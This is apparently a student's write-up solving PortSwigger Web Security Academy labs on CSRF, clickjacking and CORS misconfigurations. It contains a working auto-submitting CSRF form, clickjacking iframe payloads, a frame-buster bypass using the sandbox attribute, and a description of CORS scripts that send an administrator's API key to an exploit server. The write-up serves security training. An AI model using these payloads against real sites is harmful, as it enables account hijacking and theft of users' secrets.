CSRF, Clickjacking and CORS

• CRSF (Cross Site Request Forgery) is explained in this link here.
• CSRF token is used to defend against CSRF and more information about how it works here
• Clickjacking differs from a CSRF attack in that the user is required to perform an action such as a button click whereas a CSRF attack depends upon forging an entire request without the user's knowledge or input.
• CORS (Cross Origin Resource Sharing) is a browser mechanism which enables controlled access to resources located outside of a given domain. It extends and adds flexibility to the same-origin policy (SOP). More about CORS and its vulnerabilities here.

CSRF vulnerability with no defenses

• To solve the lab, craft some HTML that uses a CSRF attack to change the viewer's email address and upload it to your exploit server.

Enumeration

• First we need to check for the 3 conditions for CSRF to happen :

Condition	Screenshot
Relevant Action	User can update email
Cookie Based Session Handling	When attempting to change email address only cookie is used as authentication
No unpredictable request parameters	There does not seem to be any unpredictable parameters.

Vulnerability Assessment

• We can use Burp Pro function Generate CSRF PoC. Without Burp Pro, we just need to generate the HTML PoC manually.
• We will want the auto-submit script to be enabled so that no-click is required.
• Then simply copy-and-paste the generated PoC into the body of the exploit server.

  <html>
    <!-- CSRF PoC - generated by Burp Suite Professional -->
    <body>
    <script>history.pushState('', '', '/')</script>
      <form action="https://0a980072046df11fc0633c5f00230008.web-security-academy.net/my-account/change-email" method="POST">
        <input type="hidden" name="email" value="wiener&#64;super&#45;user&#46;net" />
        <input type="submit" value="Submit request" />
      </form>
      <script>
        document.forms[0].submit();
      </script>
    </body>
  </html>
  

• What this HTML essentially does is create a form with "Submit Request" button and that button will do a POST request to the email change-account page to the parameter value of wiener@super-user.net

- As can be seen above, after the button click, wiener@normal-user.net is changed to wiener@super-user.net.

Basic clickjacking with CSRF token protection

• This lab contains login functionality and a delete account button that is protected by a CSRF token. A user will click on elements that display the word "click" on a decoy website.
• To solve the lab, craft some HTML that frames the account page and fools the user into deleting their account. The lab is solved when the account is deleted.
• You can log in to your own account using the following credentials: wiener:peter

Enumeration

• We login to the account given and there is a "Delete account" button. Our goal it seems is to trick user into clicking "Delete account".

Exploitation

• We create a new webpage with the HTML code below :

<style>
    iframe {
        position:relative;
        width:500;
        height: 700;
        opacity: 0.001;
        z-index: 2;
    }
    div {
        position:absolute;
        top:500;
        left:64;
        z-index: 1;
    }
</style>
<div>click me</div>
<iframe src="https://0adb00d203113416c070200900790092.web-security-academy.net/my-account"></iframe>

• The below page is created with opacity : 0.5 so that we can see if click me is on top of "Delete account".

• Actual exploit page

• To solve the lab, we simply "Deliver exploit to victim".

Clickjacking with form input data prefilled from a URL parameter

• This lab extends #Basic clickjacking with CSRF token protection. The goal of the lab is to change the email address of the user by prepopulating a form using a URL parameter and enticing the user to inadvertently click on an "Update email" button.
• To solve the lab, craft some HTML that frames the account page and fools the user into updating their email address by clicking on a "Click me" decoy. The lab is solved when the email address is changed.
• You can log in to your own account using the following credentials: wiener:peter

Enumeration

• We log in to the login page to see how the "Update email" looks like.

• We attempt to update the email and as can be seen below, the Body parameter will need to contain email=<email address>

Exploitation

• With reference to the above exploit used we just need to append the email= into the url as a parameter. Below is the iframe that is different from the exploit above.

<div>click me</div>
<iframe src="https://0a6600b2038d7581c07e073c0094007e.web-security-academy.net/my-account?email=attacker@email.com"></iframe>

• Below is set at opacity: 0.5; so that we can see if "click me" is aligned.

• Acutal exploit

• We simply need to send the following HTML frame and lab is solved.

Clickjacking with a frame buster script

• This lab is protected by a frame buster which prevents the website from being framed. Can you get around the frame buster and conduct a clickjacking attack that changes the users email address?
• To solve the lab, craft some HTML that frames the account page and fools the user into changing their email address by clicking on "Click me". The lab is solved when the email address is changed.
• You can log in to your own account using the following credentials: wiener:peter

Enumeration

• The webpage given is the same as #Clickjacking with form input data prefilled from a URL parameter.

• Only difference is a frame busting javascript.

• Basic clickjacking is averted as can be seen below.

Exploitation

• The work around for frame buster would be sandbox="allow-forms" a HTML5 iframe "sandbox" attribute.
• As framebuster is a javascript, by adding the sandbox attribute to only "allow-forms" we essentially blocked the javascript from executing.
• As can be seen below, when the sandbox attribute is added, the iframe is loaded.

</style>
<div>click me</div>
<iframe src="https://0a3d003803725875c09e38c000dd0047.web-security-academy.net/my-account?email=aaa@attacker.com" sandbox="allow-forms" ></iframe>

CORS vulnerability with basic origin reflection

• This website has an insecure CORS configuration in that it trusts all origins.
• To solve the lab, craft some JavaScript that uses CORS to retrieve the administrator's API key and upload the code to your exploit server. The lab is solved when you successfully submit the administrator's API key.
• You can log in to your own account using the following credentials: wiener:peter

Enumeration

• We are given the website below, as can be seen, there is nothing special in the 'View details' function and hence we will focus on "My account" function.

• "My account" function brings us to a login page where we login with our credentials wiener:peter.

• We are then greeted with a page below that reveals an API key.

• From the HTML, we can see that the API key details is fetched by a script from /accountDetails directory.

• Chronologically, we can see that there are 2 GET requests made after the login POST request.

• Looking at the 2 GET requests' repsonse /my-account and /accountDetails we can see that there is nothing special with the /my-account reponse but /accountDetails reponse gives a header with Access-Control-Allow-Credentials: true which is a CORS functionality.

Vulnerability Assessment / Exploitation

• Hence we send this to Burp Repeater to try if there will be further server repsonse if we add an origin.

• Indeed, Access-Control-Allow-Origin: true is returned, and we now know CORS vulnerability exists.
• On the exploit server we added the following javascript

• We can understand more about the exploit code from here.
• this exploit assumes that when exploit is sent to victim, victim will click on to the link and follow to our exploit webserver.
• This javascript from the exploit webserver will do a GET request to the vulnerable web server. req.withCredentials() is to make sure that cross-site Access-Control is set to true.
• reqListener() will obtain the reponse body and send it to access log of exploit server.

• As can be seen above, sensitive information is leaked.

CORS vulnerability with trusted null origin

• This website has an insecure CORS configuration in that it trusts the null origin.
• To solve the lab, craft some JavaScript that uses CORS to retrieve the administrator's API key and upload the code to your exploit server. The lab is solved when you successfully submit the administrator's API key.
• You can log in to your own account using the following credentials: wiener:peter

Enumeration

• Webpage is similar to #CORS vulnerability with basic origin reflection where the difference is in the value of Origin: header.

Vulnerability Assessment / Exploitation

• As can be seen above, when Origin: is a webpage, "Access-Control" is not enabled, but if Origin: is null, "Access-Control" is enabled.

• We sent the same script (different url) as the one in #CORS vulnerability with basic origin reflection but as can be seen above we do not get the desired result.
• There could be some defences employed in the victim's site similar to #Clickjacking with a frame buster script.
• Hence we add an HTML iframe sandbox to "allow script" like below.

• We check the access log again and we get the credentials.